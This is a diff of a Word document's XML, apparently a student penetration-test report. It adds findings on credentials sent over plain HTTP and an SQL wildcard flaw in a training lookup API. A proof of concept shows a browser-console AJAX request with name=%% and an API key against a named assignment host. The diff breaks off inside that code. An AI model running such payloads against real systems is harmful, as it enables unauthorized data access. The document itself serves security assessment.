-            <w:bookmarkStart w:id="4" w:name="_Toc71393717"/>
+            <w:bookmarkStart w:id="4" w:name="_Toc71399620"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5654,7 +5676,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="5" w:name="_Proof_of_Concept"/>
-            <w:bookmarkStart w:id="6" w:name="_Toc71393718"/>
+            <w:bookmarkStart w:id="6" w:name="_Toc71399621"/>
             <w:bookmarkEnd w:id="5"/>
             <w:r>
               <w:rPr>
@@ -5814,7 +5836,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="7" w:name="_Toc71393719"/>
+            <w:bookmarkStart w:id="7" w:name="_Toc71399622"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5903,7 +5925,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="8" w:name="_Toc71393720"/>
+            <w:bookmarkStart w:id="8" w:name="_Toc71399623"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5999,7 +6021,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="9" w:name="_Toc71393721"/>
+            <w:bookmarkStart w:id="9" w:name="_Toc71399624"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6102,7 +6124,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="10" w:name="_Toc71393722"/>
+            <w:bookmarkStart w:id="10" w:name="_Toc71399625"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6189,7 +6211,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="11" w:name="_Toc71393723"/>
+            <w:bookmarkStart w:id="11" w:name="_Toc71399626"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6449,7 +6471,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71393724"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71399627"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 2 - </w:t>
@@ -6499,7 +6521,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="13" w:name="_Toc71393725"/>
+            <w:bookmarkStart w:id="13" w:name="_Toc71399628"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6739,7 +6761,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="14" w:name="_Proof_of_Concept_1"/>
-            <w:bookmarkStart w:id="15" w:name="_Toc71393726"/>
+            <w:bookmarkStart w:id="15" w:name="_Toc71399629"/>
             <w:bookmarkEnd w:id="14"/>
             <w:r>
               <w:rPr>
@@ -6943,7 +6965,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="16" w:name="_Toc71393727"/>
+            <w:bookmarkStart w:id="16" w:name="_Toc71399630"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7066,7 +7088,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="17" w:name="_Toc71393728"/>
+            <w:bookmarkStart w:id="17" w:name="_Toc71399631"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7151,7 +7173,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="18" w:name="_Toc71393729"/>
+            <w:bookmarkStart w:id="18" w:name="_Toc71399632"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7226,7 +7248,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="19" w:name="_Toc71393730"/>
+            <w:bookmarkStart w:id="19" w:name="_Toc71399633"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7309,7 +7331,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="20" w:name="_Toc71393731"/>
+            <w:bookmarkStart w:id="20" w:name="_Toc71399634"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7414,7 +7436,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc71393732"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc71399635"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -7464,7 +7486,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="22" w:name="_Toc71393733"/>
+            <w:bookmarkStart w:id="22" w:name="_Toc71399636"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7666,7 +7688,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="23" w:name="_Toc71393734"/>
+            <w:bookmarkStart w:id="23" w:name="_Toc71399637"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7753,7 +7775,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="24" w:name="_Toc71393735"/>
+            <w:bookmarkStart w:id="24" w:name="_Toc71399638"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7829,7 +7851,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="25" w:name="_Toc71393736"/>
+            <w:bookmarkStart w:id="25" w:name="_Toc71399639"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7935,7 +7957,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="26" w:name="_Toc71393737"/>
+            <w:bookmarkStart w:id="26" w:name="_Toc71399640"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8027,7 +8049,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="27" w:name="_Toc71393738"/>
+            <w:bookmarkStart w:id="27" w:name="_Toc71399641"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8158,7 +8180,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="28" w:name="_Toc71393739"/>
+            <w:bookmarkStart w:id="28" w:name="_Toc71399642"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8291,7 +8313,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc71393740"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc71399643"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -8347,7 +8369,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="30" w:name="_Toc71393741"/>
+            <w:bookmarkStart w:id="30" w:name="_Toc71399644"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8380,34 +8402,52 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ensitive information like the username and password transported via HTTP are not encrypted so it is possible that an attacker intercepts the packet</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and read directly from it.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>S</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ensitive information like the username and password transported via HTTP are not encrypted so it is possible that an attacker intercepts the packet</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> and read directly from it.</w:t>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>his could put all the other vulnerabilities at higher risk.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8432,7 +8472,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="31" w:name="_Toc71393742"/>
+            <w:bookmarkStart w:id="31" w:name="_Toc71399645"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8518,7 +8558,6 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -8551,7 +8590,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="32" w:name="_Toc71393743"/>
+            <w:bookmarkStart w:id="32" w:name="_Toc71399646"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8618,13 +8657,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> an </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>attacker manage</w:t>
+              <w:t xml:space="preserve"> an attacker manage</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8709,7 +8742,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="33" w:name="_Toc71393744"/>
+            <w:bookmarkStart w:id="33" w:name="_Toc71399647"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8800,7 +8833,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="34" w:name="_Toc71393745"/>
+            <w:bookmarkStart w:id="34" w:name="_Toc71399648"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8860,10 +8893,7 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t>, possible likelihood and major impact suggest a high risk.</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve">, possible likelihood and major impact suggest a high risk. </w:t>
             </w:r>
             <w:r>
               <w:t>The use of HTTP could be one of the first causes of why other vulnerabilities can be exploited since they all require the attacker to login first. Moreover, it is important for a company dealing with banks to use HTTPS for all of their systems to inspire trusts from their clients.</w:t>
@@ -8891,7 +8921,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="35" w:name="_Toc71393746"/>
+            <w:bookmarkStart w:id="35" w:name="_Toc71399649"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8997,7 +9027,6 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:bCs/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
@@ -9025,7 +9054,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="36" w:name="_Toc71393747"/>
+            <w:bookmarkStart w:id="36" w:name="_Toc71399650"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9321,6 +9350,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">    SSLCertificateKeyFile "/path/to/www.example.com.key"</w:t>
             </w:r>
           </w:p>
@@ -9349,7 +9379,6 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>&lt;/VirtualHost&gt;</w:t>
             </w:r>
           </w:p>
@@ -9384,7 +9413,6 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -9447,7 +9475,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc71393748"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc71399651"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -9469,7 +9497,10 @@
         <w:t>ld</w:t>
       </w:r>
       <w:r>
-        <w:t>card attack vulnerability present in the API for trainings</w:t>
+        <w:t>card attack vulnerability present in the API for training</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> lookup</w:t>
       </w:r>
       <w:bookmarkEnd w:id="37"/>
     </w:p>
@@ -9518,7 +9549,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="38" w:name="_Toc71393749"/>
+            <w:bookmarkStart w:id="38" w:name="_Toc71399652"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9551,7 +9582,72 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>The</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> wildcard attack</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> vulnerability presents in the training lookup API. </w:t>
+            </w:r>
+            <w:r>
+              <w:t>Exploiting this vulnerability could result information leakage. Since all trainings are intended to be publicly visible, we conduct that this table contains no sensitive information</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> Therefore,</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>i</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">t is said to be low-risk </w:t>
+            </w:r>
+            <w:r>
+              <w:t>as</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> attackers can only read information within t</w:t>
+            </w:r>
+            <w:r>
+              <w:t>h</w:t>
+            </w:r>
+            <w:r>
+              <w:t>at</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>table</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9581,7 +9677,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="39" w:name="_Toc71393750"/>
+            <w:bookmarkStart w:id="39" w:name="_Toc71399653"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9614,8 +9710,462 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
-            </w:r>
+              <w:t xml:space="preserve">This vulnerability can be exploited by </w:t>
+            </w:r>
+            <w:r>
+              <w:t>putting “%%”</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> [1]</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> as the training name in the API. Running the following payload in the browser console after login will list all the trainings in the store.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Note that the apikey needs to be replace with a valid one)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-variable"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>ajax</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>({</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>url</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"http://assignment-hermes.unimelb.life/api/store.php?name=%%"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>type</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"get"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>headers</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>: {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="200" w:firstLine="360"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>apikey</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"ad266779-af2a-11eb-9a2c-0242ac110002"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>}).</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>done</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>((</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-def"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-operator"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>=&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="100" w:firstLine="180"/>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-variable"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-property"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-variable-2"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
